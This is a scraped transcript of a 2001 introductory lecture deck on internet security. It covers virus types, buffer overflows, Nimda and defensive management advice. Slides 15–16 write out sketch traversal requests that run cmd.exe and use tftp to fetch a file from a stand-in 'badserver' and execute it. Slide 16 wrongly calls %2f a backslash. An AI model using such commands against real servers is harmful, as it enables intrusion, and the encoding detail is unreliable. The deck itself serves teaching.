Presentation is loading. Please wait.

Presentation is loading. Please wait.

Security on the Internet Norman White ©2001. Security What is it? Confidentiality – Can my information be stolen? Integrity – Can it be changed? Availability.

Published byJonathan Carr Modified over 8 years ago

Similar presentations

Presentation on theme: "Security on the Internet Norman White ©2001. Security What is it? Confidentiality – Can my information be stolen? Integrity – Can it be changed? Availability."— Presentation transcript:

1 Security on the Internet Norman White ©2001

2 Security What is it? Confidentiality – Can my information be stolen? Integrity – Can it be changed? Availability – Wil my information always be available.

3 Confidentiality How do I keep my data protected from prying eyes. Physical protection Protect systems, backup tapes, networks etc. Hard to protect all possible attacks Encryption – keep my data in a form that only I understand Hard to distribute, process data Still not immune to decryption Need both Physical and encryption

4 Integrity What do we do if someone just wants to destroy our data? Hackers, competitors etc. BACKUPS – Need sophisticated backup policies Vigilance – Need to keep track of security updates, Procedures – Need to have policies and procedures in place that deter security vilations

5 Availability What can I do about Denial of Service (DoS) attacks? Need network infrastructure protection Routers that reject typical Dos attacks Distributed servers on different networks that can take over for each other What about virus attacks?

6 Client security What are common ways to infect client workstations?

7 Some Viruses… Boot sector viruses Boot sector viruses infect the boot sector or partition table of a disk. Computer systems are most likely to be attacked by boot sector viruses when you boot the system with an infected disk from the floppy drive - the boot attempt does not have to be successful for the virus to infect the hard drive. Also, there are a few viruses that can infect the boot sector from executable programs- these are known as multi-partite viruses and they are relatively rare. Once the system is infected, the boot sector virus will attempt to infect every disk that is accessed by that computer. In general, boot sector viruses can be successfully removed.

8 Active X Viruses ActiveX malicious code ActiveX controls allow Web developers to create interactive, dynamic Web pages with broader functionality. An ActiveX control is a component object embedded in a Web page which runs automatically when the page is viewed. In many cases, the Web browser can be configured so that these ActiveX controls do not execute by changing the browser's security settings to "high." However, hackers, virus writers, and others who wish to cause mischief or worse may use ActiveX malicious code as a vehicle to attack the system. To remove malicious ActiveX controls, you just need to delete them.

9 Macro Viruses Macro viruses are viruses that use another application's macro programming language to distribute themselves. They infect documents such as MS Word or MS Excel. Unlike other viruses, macro viruses do not infect programs or boot sectors - although a few do drop programs on the user's hard drive. The dropped files may infect executable programs or boot sectors.

10 Script viruses (VBScript, JavaScript, HTML) Script viruses are written in script programming languages, such as VBScript and JavaScript. VBScript (Visual Basic Script) and JavaScript viruses make use of Microsoft's Windows Scripting Host to activate themselves and infect other files. Since Windows Scripting Host is available on Windows 98 and Windows 2000, the viruses can be activated simply by double-clicking the *.vbs or *.js file from Windows Explorer. HTML viruses use the scripts embedded in HTML files to do their damage. These embedded scripts automatically execute the moment the HTML page is viewed from a script-enabled browser.

11 Worm A computer worm is a self-contained program (or set of programs) that is able to spread functional copies of itself or its segments to other computer systems. The propagation usually takes place via network connections or email attachments. To get rid of a worm you just need to delete the program.

12 How are servers infected Overflow techniques Infecting program sends a request that is too large for server too handle, usually where some parameter that a server program expects is designed to actually break the program in a way that the infecting program gets control. Executing known programs to get command control

13 Overflow examples Unix lpd Send unix server a lpd (line printer daemon) request that is too long. Parameters overflow lpd buffer into the code. Lpd is running as root, so hacker worm gains root control of machine. Worm program then initiates a file transfer of the rest of the program. Then starts scanning for other machines to break-in to.

14 Overflow technigues Virtually any remotely executed capability can be broken into this way if the code does not check for parameter valid lengths

15 Unicode Problems Basic technique Send web server a request to run GET..\..\cmd.exe tftp badfile badserver hackedserver Then issue a command GET badfile.exe parameters… Voila, hacker just broke in and dropped badfile on hacked system, then ran it. Solution don’t allow “\” character in command string

16 Unicode 2 SO.. Hacker now sends command GET..%2f..%2fcmd. Exe tftp etc %2f is the UNICODE representation of \ Windows doesn’t see the \, but later expands the %2f to a backslash before it execute command. So hackers then changed to the unicode representation of %2f Solution.. Check after expansion, not before.

17 Filesharing Problems Open network files shares allow hacker to drop infected files on user system waiting for them to be executed.

18 Example NIMDA Did all of above Used Unicode to break-in Used email of scripts to break in Infected all open files shares Used previous trojan horse vulnerabilities

19 Management Takeaway Security is very important Assume you will be broken into, have a plan Monitor attacks constantly Keep systems up to date Configure firewalls etc. to control traffic Partition off external systems Watch out for users accessing from home, extends vulnerability.

Download ppt "Security on the Internet Norman White ©2001. Security What is it? Confidentiality – Can my information be stolen? Integrity – Can it be changed? Availability."

Similar presentations

Thank you to IT Training at Indiana University Computer Malware.

Thank you to IT Training at Indiana University Computer Malware.
Computer viruses Hardware theft Software Theft Unauthorized access by hackers Information Theft Computer Crimes.

Computer viruses Hardware theft Software Theft Unauthorized access by hackers Information Theft Computer Crimes.
Computer Viruses.

Computer Viruses.
Lesson 14-Desktop Protection. Overview Protect against malicious code. Use the Internet. Protect against physical tampering.

Lesson 14-Desktop Protection. Overview Protect against malicious code. Use the Internet. Protect against physical tampering.
Protecting Yourself Online. VIRUSES, TROJANS, & WORMS Computer viruses are the common cold of modern technology. One e-mail in every 200 containing.

Protecting Yourself Online. VIRUSES, TROJANS, & WORMS Computer viruses are the "common cold" of modern technology. One in every 200 containing.
Mobile Code and Worms By Mitun Sinha Pandurang Kamat 04/16/2003.

Mobile Code and Worms By Mitun Sinha Pandurang Kamat 04/16/2003.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.

Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.

Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
Computer Viruses By Patsy Speer What is a Virus? Malicious programs that cause damage to your computer, files and information They slow down the internet.

Computer Viruses By Patsy Speer What is a Virus? Malicious programs that cause damage to your computer, files and information They slow down the internet.
R. FRANK NIMS MIDDLE SCHOOL A BRIEF INTRODUCTION TO VIRUSES.

R. FRANK NIMS MIDDLE SCHOOL A BRIEF INTRODUCTION TO VIRUSES.
Computer security virus, hacking and backups. Computer viruses are small software programs that are designed to spread from one computer to another.

Computer security virus, hacking and backups. Computer viruses are small software programs that are designed to spread from one computer to another.
Henric Johnson1 Chapter 10 Malicious Software Henric Johnson Blekinge Institute of Technology, Sweden

Henric Johnson1 Chapter 10 Malicious Software Henric Johnson Blekinge Institute of Technology, Sweden
Video Following is a video of what can happen if you don’t update your security settings! security.

Video Following is a video of what can happen if you don’t update your security settings! security.
1GMS-VU : Module 2 Introduction to Information and Communication Technologies Module 2 Computer Software.

1GMS-VU : Module 2 Introduction to Information and Communication Technologies Module 2 Computer Software.
1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.

1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.
Malicious Code Brian E. Brzezicki. Malicious Code (from Chapter 13 and 11)

Malicious Code Brian E. Brzezicki. Malicious Code (from Chapter 13 and 11)
Malware  Viruses  E-mail Virus  Worms  Trojan Horses  Spyware –Keystroke Loggers  Adware.

Malware  Viruses  Virus  Worms  Trojan Horses  Spyware –Keystroke Loggers  Adware.
The Utility Programs: The system programs which perform the general system support and maintenance tasks are known as utility programs. Tasks performed.

The Utility Programs: The system programs which perform the general system support and maintenance tasks are known as utility programs. Tasks performed.
Network Security Introduction Some of these slides have been modified from slides of Michael I. Shamos COPYRIGHT © 2003 MICHAEL I. SHAMOS.

Network Security Introduction Some of these slides have been modified from slides of Michael I. Shamos COPYRIGHT © 2003 MICHAEL I. SHAMOS.
Virus and Antivirus Team members: - Muzaffar Malik - Kiran Karki.

Virus and Antivirus Team members: - Muzaffar Malik - Kiran Karki.

Similar presentations

Ads by Google